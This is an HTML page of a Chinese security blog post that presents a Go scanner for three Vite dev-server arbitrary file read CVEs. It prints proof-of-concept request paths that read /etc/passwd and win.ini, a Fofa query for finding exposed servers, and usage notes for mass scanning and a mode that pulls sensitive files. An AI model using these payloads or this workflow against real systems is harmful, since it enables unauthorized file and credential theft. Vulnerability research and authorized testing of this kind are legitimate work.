<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="背景这几天 Vite 这个前端框架突然因为爆出的任意文件读取漏洞CVE-2025-30208引起了广泛关注，研究了一下这个漏洞，发现不仅利用简单，而且受影响的范围非常广。这几天又正好学习了 go 语言，闲来无事就用 go 写了关于这个漏洞的扫描器。下面就直接把我写的这个工具的 README.md 贴出来了，工具地址贴在这里了,觉得不错的兄弟们可以麻烦给个 star 嘛，谢谢啦：https:&#x2F;&#x2F;gi">
<meta property="og:type" content="article">
<meta property="og:title" content="一个针对 Vite 任意文件读取漏洞的扫描器">
<meta property="og:url" content="https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/index.html">
<meta property="og:site_name" content="海蘑菇的自留地">
<meta property="og:description" content="背景这几天 Vite 这个前端框架突然因为爆出的任意文件读取漏洞CVE-2025-30208引起了广泛关注，研究了一下这个漏洞，发现不仅利用简单，而且受影响的范围非常广。这几天又正好学习了 go 语言，闲来无事就用 go 写了关于这个漏洞的扫描器。下面就直接把我写的这个工具的 README.md 贴出来了，工具地址贴在这里了,觉得不错的兄弟们可以麻烦给个 star 嘛，谢谢啦：https:&#x2F;&#x2F;gi">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-04-09T03:23:39.000Z">
<meta property="article:modified_time" content="2025-04-09T13:51:19.698Z">
<meta property="article:author" content="anch0r">
<meta property="article:tag" content="安全工具">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>一个针对 Vite 任意文件读取漏洞的扫描器</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
  <!-- Waline Comments -->
  
    <link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css"/>
  
<meta name="generator" content="Hexo 7.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/01/21/Commons%20Collections%201%20%E5%88%A9%E7%94%A8%E9%93%BE/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&text=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&is_video=false&description=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=一个针对 Vite 任意文件读取漏洞的扫描器&body=Check out this article: https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&name=一个针对 Vite 任意文件读取漏洞的扫描器&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&t=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%83%8C%E6%99%AF"><span class="toc-number">1.</span> <span class="toc-text">背景</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">漏洞介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9EPOC%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞POC：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Fofa%E6%B5%8B%E7%BB%98%E8%AF%AD%E6%B3%95%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">Fofa测绘语法：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E4%BB%8B%E7%BB%8D"><span class="toc-number">3.</span> <span class="toc-text">工具使用介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7%E7%89%B9%E7%82%B9"><span class="toc-number">3.1.</span> <span class="toc-text">工具特点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%96%E8%AF%91%E8%AF%B4%E6%98%8E"><span class="toc-number">3.2.</span> <span class="toc-text">编译说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">3.3.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%8F%82%E6%95%B0%E4%BB%8B%E7%BB%8D"><span class="toc-number">3.4.</span> <span class="toc-text">命令行参数介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%B4%E6%98%8E"><span class="toc-number">3.5.</span> <span class="toc-text">说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%8D%E8%B4%A3%E5%A3%B0%E6%98%8E"><span class="toc-number">4.</span> <span class="toc-text">免责声明</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        一个针对 Vite 任意文件读取漏洞的扫描器
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">anch0r</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-09T03:23:39.000Z" class="dt-published" itemprop="datePublished">2025-04-09</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/">安全工具</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/" rel="tag">安全工具</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h2><p>这几天 Vite 这个前端框架突然因为爆出的任意文件读取漏洞CVE-2025-30208引起了广泛关注，研究了一下这个漏洞，发现不仅利用简单，而且受影响的范围非常广。这几天又正好学习了 go 语言，闲来无事就用 go 写了关于这个漏洞的扫描器。下面就直接把我写的这个工具的 README.md 贴出来了，工具地址贴在这里了,觉得不错的兄弟们可以麻烦给个 star 嘛，谢谢啦：<a target="_blank" rel="noopener" href="https://github.com/jackieya/ViteVulScan%EF%BC%8C">https://github.com/jackieya/ViteVulScan，</a></p>
<h2 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h2><p>涉及3个漏洞：CVE-2025-30208/CVE-2025-31125/CVE-2025-31486，都是关于Vite开发服务器任意文件读取漏洞，这三个漏洞覆盖面大且利用简单不受限制。</p>
<h3 id="漏洞POC："><a href="#漏洞POC：" class="headerlink" title="漏洞POC："></a>漏洞POC：</h3><p>CVE-2025-30208：</p>
<blockquote>
<p>Windows: /@fs/C://Windows/win.ini?import&amp;raw??</p>
<p>Linux: /@fs/etc/passwd?import&amp;raw??</p>
</blockquote>
<p>CVE-2025-31125</p>
<blockquote>
<p>Windows: /@fs/C://windows/win.ini?import&amp;?inline=1.wasm?init</p>
<p>Linux: /@fs/etc/passwd?import&amp;?inline=1.wasm?init</p>
</blockquote>
<p>CVE-2025-31486</p>
<blockquote>
<p>Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&amp;?inline=1.wasm?init</p>
<p>Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&amp;?inline=1.wasm?init</p>
</blockquote>
<p>路径中的/@fs可以不需要携带。</p>
<h3 id="Fofa测绘语法："><a href="#Fofa测绘语法：" class="headerlink" title="Fofa测绘语法："></a>Fofa测绘语法：</h3><blockquote>
<p>body=”/@vite/client”</p>
</blockquote>
<h2 id="工具使用介绍"><a href="#工具使用介绍" class="headerlink" title="工具使用介绍"></a>工具使用介绍</h2><h3 id="工具特点"><a href="#工具特点" class="headerlink" title="工具特点"></a>工具特点</h3><ol>
<li>可以联动fofa进行批量利用</li>
<li>会解析存在漏洞的精确路径并进行深度利用</li>
<li>充分利用 go 的并发功能，可以实现在短时间内对大量资产进行快速的批量探测</li>
</ol>
<h3 id="编译说明"><a href="#编译说明" class="headerlink" title="编译说明"></a>编译说明</h3><p>go版本：<code>go 1.20以上版本</code></p>
<p>进入到项目根目录</p>
<p>先同步一下依赖</p>
<blockquote>
<p>go mod tidy</p>
</blockquote>
<p>然后编译项目</p>
<blockquote>
<p> go build -o ViteVulScan -ldflags=”-s -w” -trimpath .</p>
</blockquote>
<p><code> ./ViteVulScan</code>即可运行该脚本。</p>
<p>当然你也可以直接在项目根目录下运行该项目:</p>
<blockquote>
<p>go run . </p>
</blockquote>
<h3 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h3><p>脚本支持联动fofa搜索资产然后进行批量检测。</p>
<p>要想使用fofa，要确保app.ini文件和编译后的二进制文件在同一目录，并且需要修改config目录下的app.ini文件，其中的fofakey字段填上自己的fofakey，num是自己估摸要检测的大概资产数量。</p>
<p>如果你有针对该漏洞更好的fofa测绘语法，可以自行修改fofaQuery字段。</p>
<h3 id="命令行参数介绍"><a href="#命令行参数介绍" class="headerlink" title="命令行参数介绍"></a>命令行参数介绍</h3><blockquote>
<p>Usage of ./ViteVulScan:</p>
</blockquote>
<table>
<thead>
<tr>
<th>参数</th>
<th align="center">描述</th>
</tr>
</thead>
<tbody><tr>
<td>-cve</td>
<td align="center">使用哪个cve漏洞进行检测。支持CVE_2025_30208/CVE_2025_31125/CVE_2025_31486。默认使用CVE_2025_30208。</td>
</tr>
<tr>
<td>-fofa</td>
<td align="center">指定该参数后，会联动fofa测绘资产，对得到的目标资产进行批量检测</td>
</tr>
<tr>
<td>-u    |    -url</td>
<td align="center">指定单个url目标，对其进行检测</td>
</tr>
<tr>
<td>-f     |     -filename</td>
<td align="center">指定一个文件名，批量检测其中的url地址</td>
</tr>
<tr>
<td>-e</td>
<td align="center">指定该参数后，会对检测存在漏洞的资产进行深度利用，读取各种可能存在的敏感文件并保存在本地。(请谨慎使用该功能，最好是对单个目标检测，也就是使用-u时加上该参数)</td>
</tr>
</tbody></table>
<h3 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h3><ol>
<li>批量检测一个文件中的所有目标URL，确保文件中每行一个URL即可，URL可以是包含http的完整URL，也可以是一个域名或者ip，比如：<figure class="highlight text"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://example1.com </span><br><span class="line">example2.com</span><br><span class="line">127.0.0.1</span><br></pre></td></tr></tbody></table></figure></li>
<li>当指定-fofa和-f参数进行检测后，会自动将存在漏洞的资产保存到当前文件下，文件名格式为”当下时间戳.csv”。 </li>
<li>同时支持对linux和windows平台进行利用，利用的字典分别为dict目录下的linux_sensitive_path.txt和windows_sensitive_path.txt，如果有更多敏感路径，可以自己在相应的字典中进行添加。</li>
</ol>
<h2 id="免责声明"><a href="#免责声明" class="headerlink" title="免责声明"></a>免责声明</h2><p>本工具仅用于安全研究和授权测试，请勿用于非法用途。使用本工具进行任何未经授权的测试所造成的后果由使用者自行承担。</p>

  </div>
</article>
<!-- themes\cactus\layout\_partial\comments.ejs -->




    <div class="blog-post-comments">
        <div id="waline_thread"></div>
    </div>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%83%8C%E6%99%AF"><span class="toc-number">1.</span> <span class="toc-text">背景</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">2.</span> <span class="toc-text">漏洞介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9EPOC%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞POC：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Fofa%E6%B5%8B%E7%BB%98%E8%AF%AD%E6%B3%95%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">Fofa测绘语法：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E4%BB%8B%E7%BB%8D"><span class="toc-number">3.</span> <span class="toc-text">工具使用介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7%E7%89%B9%E7%82%B9"><span class="toc-number">3.1.</span> <span class="toc-text">工具特点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BC%96%E8%AF%91%E8%AF%B4%E6%98%8E"><span class="toc-number">3.2.</span> <span class="toc-text">编译说明</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE"><span class="toc-number">3.3.</span> <span class="toc-text">配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%8F%82%E6%95%B0%E4%BB%8B%E7%BB%8D"><span class="toc-number">3.4.</span> <span class="toc-text">命令行参数介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%B4%E6%98%8E"><span class="toc-number">3.5.</span> <span class="toc-text">说明</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%8D%E8%B4%A3%E5%A3%B0%E6%98%8E"><span class="toc-number">4.</span> <span class="toc-text">免责声明</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&text=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&is_video=false&description=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=一个针对 Vite 任意文件读取漏洞的扫描器&body=Check out this article: https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&title=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&name=一个针对 Vite 任意文件读取漏洞的扫描器&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.anch0r.top/2025/04/09/%E4%B8%80%E4%B8%AA%E9%92%88%E5%AF%B9Vite%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%89%AB%E6%8F%8F%E5%99%A8/&t=一个针对 Vite 任意文件读取漏洞的扫描器"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024-2025
    anch0r
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
      --><li><a href="/">首页</a></li><!--
    --><!--
      --><li><a href="/archives/">归档</a></li><!--
    --><!--
      --><li><a href="/categories/">categories</a></li><!--
    --><!--
      --><li><a href="/tags/">tags</a></li><!--
    --><!--
      --><li><a href="/about/">关于</a></li><!--
    --><!--
      --><li><a href="/search/">搜索</a></li><!--
    -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
  
</footer>


    </div>
    <!-- styles -->



